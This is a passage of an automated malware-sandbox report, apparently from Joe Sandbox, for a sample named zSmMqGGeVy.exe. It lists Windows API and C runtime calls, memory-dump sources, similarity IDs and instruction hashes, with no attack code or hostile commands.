                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041804B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                                  • String ID:
                                                  • API String ID: 4031098158-0
                                                  • Opcode ID: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                  • Instruction ID: bf6bde338aaa4c5312f696cbfa7b8c1c2da82e764b9ff6896d8d464e3c4a4b13
                                                  • Opcode Fuzzy Hash: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                                  • Instruction Fuzzy Hash: 13D19C71E042589FCF15CFA8C9809EEBBB5FF49314F29006AE815BB341D735A986CB58
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 00EA7F82
                                                  • __fassign.LIBCMT ref: 00EA8161
                                                  • __fassign.LIBCMT ref: 00EA817E
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EA81C6
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EA8206
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EA82B2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                                  • String ID:
                                                  • API String ID: 4031098158-0
                                                  • Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                  • Instruction ID: cb1242522603102afb0c0946be59201f39fc2c7cbd8cd9547608fd4efc616393
                                                  • Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                                  • Instruction Fuzzy Hash: 7DD1BD71D016489FCF15CFE8C980AEDBBB5FF49304F281169E855BB252DB31AA46CB60
                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                  • __fassign.LIBCMT ref: 1000B905
                                                  • __fassign.LIBCMT ref: 1000B922
                                                  • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                  • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                  • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                  • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0040AD9B,0040A35F,00409999), ref: 0040ADB2
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040ADC0
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040ADD9
                                                  • SetLastError.KERNEL32(00000000,0040AD9B,0040A35F,00409999), ref: 0040AE2B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                  • Instruction ID: f4b61bc4878066cd9e5532c4ff7823403916b0aca9ffed94e046062e6da044f3
                                                  • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                  • Instruction Fuzzy Hash: 6201D8722493125FE6342A76BC459572A54EB51779720033FF910B71E2EF3D4C32558E
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00E9B002,00E9A5C6,00E99C00), ref: 00E9B019
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E9B027
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E9B040
                                                  • SetLastError.KERNEL32(00000000,00E9B002,00E9A5C6,00E99C00), ref: 00E9B092
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                  • Instruction ID: 6f2de632e6216d4b1a199b8a0a4475d0a422dd1ec9adf97f7efc2c65dea99885
                                                  • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                  • Instruction Fuzzy Hash: A5018832609711AFAE342FB57D859972794EB0177C7301239F524B61F2EF594C125144
                                                  APIs
                                                  • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                  • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                  • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                  • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                  • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free_strpbrk
                                                  • String ID: *?
                                                  • API String ID: 3300345361-2564092906
                                                  • Opcode ID: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                                  • Instruction ID: 08919aac2af5baaa0bc26bb502442345b411eba09a4371073371dd33b5eb5490
                                                  • Opcode Fuzzy Hash: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                                  • Instruction Fuzzy Hash: 34613F75E00619DFCB14CFA9C8815EEFBF5EF88354B24816AE815F7300E675AE818B94
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free_strpbrk
                                                  • String ID: *?
                                                  • API String ID: 3300345361-2564092906
                                                  • Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                  • Instruction ID: 82d2ef4a4de003e7697152d43fb8ed1b944d2aa4c8da6506cdc5e90fa603429b
                                                  • Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                                  • Instruction Fuzzy Hash: 95613876E006199FCB14DFA8C8815EEFBF5EF4D314B2591AAE815FB340D631AE418B90
                                                  Strings
                                                  • C:\Users\user\Desktop\zSmMqGGeVy.exe, xrefs: 00EA6388
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                  • API String ID: 0-201830514
                                                  • Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                  • Instruction ID: 37df6c1edc425f0742f1cbecb465762b3d9c20e0df801dd5f46ad83c57e42402
                                                  • Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                                  • Instruction Fuzzy Hash: 8A21B0B1600105BF9F20BF618D858AB77ADAB4F3A8719A524F529EA150E721FD018760
                                                  Strings
                                                  • C:\Users\user\Desktop\zSmMqGGeVy.exe, xrefs: 1000833B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                  • API String ID: 0-201830514
                                                  • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                  • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                  • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                  • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                  APIs
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0040BED8,?,?,0042B000,00000000,?,0040C003,00000004,InitializeCriticalSectionEx,0041EAF4,InitializeCriticalSectionEx,00000000), ref: 0040BEA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID: api-ms-
                                                  • API String ID: 3664257935-2084034818
                                                  • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                  • Instruction ID: 1d2ba87bd7351691bab4046b775a4f225d6c09ed93031ba1482b23a36008251d
                                                  • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                  • Instruction Fuzzy Hash: 1B11C135A41620ABCB228B68DC45BDA7794EF02760F114632EE05B73C0D778EC058ADD
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EF44,?,?,0040EF0C,00000000,771ADF80,?), ref: 0040EF64
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF77
                                                  • FreeLibrary.KERNEL32(00000000,?,?,0040EF44,?,?,0040EF0C,00000000,771ADF80,?), ref: 0040EF9A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                  • Instruction ID: a9aeb9bb373945a448fb4c2f2a76f55d061337ba3b70deabe2e5838c542f66b1
                                                  • Opcode Fuzzy Hash: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                                  • Instruction Fuzzy Hash: E0F0A070A0421AFBCB119B52ED09BDEBF78EF00759F144071F905B21A0CB788E11DB98
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                  • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                  • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                  • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                  • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                  • __alloca_probe_16.LIBCMT ref: 1000A736
                                                  • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                  • __freea.LIBCMT ref: 1000A837
                                                  • __freea.LIBCMT ref: 1000A843
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: __alloca_probe_16__freea$Info
                                                  • String ID:
                                                  • API String ID: 2330168043-0
                                                  APIs
                                                  • __alloca_probe_16.LIBCMT ref: 00413724
                                                  • __alloca_probe_16.LIBCMT ref: 004137EA
                                                  • __freea.LIBCMT ref: 00413856
                                                    • Part of subcall function 0041249E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                  • __freea.LIBCMT ref: 0041385F
                                                  • __freea.LIBCMT ref: 00413882
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1423051803-0
                                                  APIs
                                                  • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                  • __alloca_probe_16.LIBCMT ref: 1000B101
                                                  • __freea.LIBCMT ref: 1000B16D
                                                    • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                  • __freea.LIBCMT ref: 1000B176
                                                  • __freea.LIBCMT ref: 1000B199
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1423051803-0
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 00E92C5F
                                                  • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00E92C74
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00E92C82
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00E92C9D
                                                  • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00E92CBC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                  • String ID:
                                                  • API String ID: 2509773233-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                  • String ID:
                                                  • API String ID: 3136044242-0
                                                  APIs
                                                  • _free.LIBCMT ref: 00416FF9
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  • _free.LIBCMT ref: 0041700B
                                                  • _free.LIBCMT ref: 0041701D
                                                  • _free.LIBCMT ref: 0041702F
                                                  • _free.LIBCMT ref: 00417041
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  APIs
                                                  • _free.LIBCMT ref: 00EA7260
                                                    • Part of subcall function 00EA1D29: HeapFree.KERNEL32(00000000,00000000,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?), ref: 00EA1D3F
                                                    • Part of subcall function 00EA1D29: GetLastError.KERNEL32(?,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?,?), ref: 00EA1D51
                                                  • _free.LIBCMT ref: 00EA7272
                                                  • _free.LIBCMT ref: 00EA7284
                                                  • _free.LIBCMT ref: 00EA7296
                                                  • _free.LIBCMT ref: 00EA72A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  APIs
                                                  • _free.LIBCMT ref: 1000C536
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000C548
                                                  • _free.LIBCMT ref: 1000C55A
                                                  • _free.LIBCMT ref: 1000C56C
                                                  • _free.LIBCMT ref: 1000C57E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O*$rB$rB
                                                  • API String ID: 0-546290271
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E951B2
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  • Sleep.KERNEL32(000007D0), ref: 00E9552A
                                                  • Sleep.KERNEL32(000007D0), ref: 00E95544
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
                                                  • String ID: updateSW
                                                  • API String ID: 500923978-2484434887
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: *?
                                                  • API String ID: 269201875-2564092906
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                                  • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID: api-ms-
                                                  • API String ID: 3177248105-2084034818
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  APIs
